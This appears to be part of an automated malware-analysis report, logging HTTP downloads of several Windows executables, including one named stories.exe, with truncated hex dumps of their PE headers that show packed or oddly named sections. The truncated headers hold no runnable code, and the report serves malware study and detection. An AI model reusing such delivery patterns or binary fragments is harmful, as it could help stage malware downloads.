Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 15 Nov 2024 13:09:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 15 Nov 2024 13:09:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 15 Nov 2024 13:09:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 15 Nov 2024 13:09:33 GMTContent-Type: application/octet-streamContent-Length: 3243008Last-Modified: Fri, 15 Nov 2024 12:59:28 GMTConnection: keep-aliveETag: "673745b0-317c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 80 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 7d 3e 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 6c 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 6c 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 65 64 6e 63 66 68 7a 7a 00 c0 2a 00 00 b0 06 00 00 be 2a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 77 6b 72 6b 64 75 6c 00 10 00 00 00 70 31 00 00 04 00 00 00 56 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 31 00 00 22 00 00 00 5a 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Fri, 15 Nov 2024 13:10:08 GMTContent-Type: application/octet-streamContent-Length: 6233398Connection: keep-aliveX-Powered-By: PHP/7.4.33Content-Description: File TransferContent-Disposition: attachment; filename=stories.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 33 11 c4 5c 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 6a 0a 00 00 94 00 00 00 00 00 00 d0 7e 0a 00 00 10 00 00 00 90 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 60 0b 00 9a 00 00 00 00 40 0b 00 1c 0f 00 00 00 90 0b 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 42 0b 00 40 02 00 00 00 50 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 50 0a 00 00 10 00 00 00 52 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 68 16 00 00 00 70 0a 00 00 18 00 00 00 56 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 37 00 00 00 90 0a 00 00 38 00 00 00 6e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 6c 67 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 1c 0f 00 00 00 40 0b 00 00 10 00 00 00 a6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 50 0b 00 00 02 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9a 00 00 00 00 60 0b 00 00 02 00 00 00 b8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 18 00 00 00 00 70 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 5d 00 00 00 00 80 0b 00 00 02 00 00 00 ba 0a 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 15 Nov 2024 13:10:20 GMTContent-Type: application/octet-streamContent-Length: 1848320Last-Modified: Fri, 15 Nov 2024 12:59:13 GMTConnection: keep-aliveETag: "673745a1-1c3400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 f6 ac 34 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ce 03 00 00 c0 00 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 a1 33 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 40 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 4a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 30 05 00 00 00 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 50 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6e 6c 68 71 63 6d 65 00 b0 19 00 00 a0 2f 00 00 b0 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 62 62 70 65 78 62 6f 00 10 00 00 00 50 49 00 00 04 00 00 00 0e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 49 00 00 22 00 00 00 12 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 15 Nov 2024 13:10:29 GMTContent-Type: application/octet-streamContent-Length: 1812480Last-Modified: Fri, 15 Nov 2024 12:59:20 GMTConnection: keep-aliveETag: "673745a8-1ba800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 80 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 69 00 00 04 00 00 1e 22 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6c 67 72 76 7a 6d 74 00 10 1a 00 00 60 4f 00 00 0c 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 64 72 6e 73 6a 67 62 00 10 00 00 00 70 69 00 00 04 00 00 00 82 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 69 00 00 22 00 00 00 86 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 15 Nov 2024 13:10:43 GMTContent-Type: application/octet-streamContent-Length: 2790400Last-Modified: Fri, 15 Nov 2024 12:57:55 GMTConnection: keep-aliveETag: "67374553-2a9400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 